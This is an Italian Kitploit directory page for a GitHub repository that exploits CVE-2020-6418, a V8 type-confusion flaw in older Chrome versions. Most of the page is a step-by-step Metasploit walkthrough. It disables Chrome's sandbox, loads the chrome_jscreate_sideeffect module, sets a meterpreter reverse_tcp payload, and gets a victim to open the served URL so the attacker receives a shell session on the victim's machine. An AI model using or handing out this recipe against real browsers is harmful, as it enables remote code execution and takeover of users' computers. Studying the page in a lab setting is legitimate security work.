Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-6418 — Exploit per CVE-2020-6418, una confusione di tipo in V8, che consente l'esecuzione remota di codice tramite una pagina HTML appositamente creata. Utilizza Metasploit per consegnare un payload di reverse shell. | Kitploit
Strumenti/GitHubGitHub/sivapriyaranganatha/cve-2020-6418
Framework di ExploitGenerazione di PayloadExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubsivapriyaranganatha/cve-2020-6418

CVE-2020-6418

Exploit per CVE-2020-6418, una confusione di tipo in V8, che consente l'esecuzione remota di codice tramite una pagina HTML appositamente creata. Utilizza Metasploit per consegnare un payload di reverse shell.

Vedi Repository
1134 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2020-6418

Il CVE 2020-6418 riguarda la confusione di tipo in V8 in Google Chrome. Le versioni interessate erano precedenti alla 80.0.3987.122. La vulnerabilità viene sfruttata da un attaccante remoto che accede alla shell di un dispositivo target tramite una pagina HTML appositamente creata.

Requisiti di Ambiente

  1. Google Chrome con versione precedente alla 80.0.3987.122 .
root@kitploit:~
Nota : Il browser Google Chrome deve essere eseguito senza sandbox affinché l'exploit abbia successo.
  1. Metasploit Framework
  2. SO : Qualsiasi

Impostazione dell'Exploit

  1. Google Chrome Versione v80.0.3987.87
    https://www.neowin.net/news/google-chrome-800398787-offline-installer/
  2. Windows v11
  3. Kali Linux v2021.1

Configurazione di Google Chrome senza sandbox

i) Creare un collegamento per Google Chrome
ii) Fare clic su Proprietà > andare all'opzione chiamata "Destinazione"
iii) Alla fine del file EXE, dare uno spazio e inserire -no-sandbox
iv) Fare clic su Applica > Ok
v) Aprire un nuovo browser Google Chrome e si vedrà un pop-up con il seguente messaggio.

root@kitploit:~
You are using an unsupported command-line flag: -no-sandbox. Stability ans security will suffer

Dimostrazione per Disabilitare la Sandbox

https://user-images.githubusercontent.com/49935118/159386732-dc812ab2-f22e-4eb4-9585-4783a55b6706.mp4

Utilizzo di Metasploit

Poiché stiamo usando Kali come ambiente per eseguire l'exploit, Metasploit viene fornito come strumento integrato nella distribuzione. Ma se si utilizzano altre distribuzioni, è necessario configurare Metasploit prima di iniziare l'exploit.

Fare riferimento all'installazione di Metasploit per ulteriori chiarimenti.

Esecuzione dell'exploit

i) Avviare il framework Metasploit

root@kitploit:~
> msfconsole

ii) Trovare l'exploit

root@kitploit:~
> search chrome_js

iii) Utilizzare l'exploit disponibile dall'output precedente

root@kitploit:~
> Use exploit/multi/browser/chrome_jscreate_sideeffect

iv) Fornire l'indirizzo IP SRVHOST

root@kitploit:~
> set SRVHOST <ip address>

v) Fornire il Target Qui abbiamo due opzioni

  1. Target 0 : Per Windows
  2. Target 1 : Per MAC
root@kitploit:~
> set Target " Numero "

vi) Fornire il Payload

root@kitploit:~
> set PAYLOAD windows/x64/meterpreter/reverse_tcp

vii) Per controllare le impostazioni e le opzioni correnti abilitate.

root@kitploit:~
> show options

viii) Per eseguire l'exploit

root@kitploit:~
> run (or) > exploit

ix) Verrà fornito un URL che deve essere copiato nel browser per attivare la sessione.

x) Una volta che l'utente accede all'URL, verrà creata una sessione. Per verificarlo

root@kitploit:~
> show sessions

xi) Utilizzando la sessione, possiamo controllare le informazioni di sistema dell'utente / entrare nella shell.

root@kitploit:~
> sessions <numero>
> shell

Dimostrazione dell'exploit

https://user-images.githubusercontent.com/49935118/159605013-d6033f7f-8fcc-4617-8f8e-6b909a5aebe6.mp4

Scarica lo strumento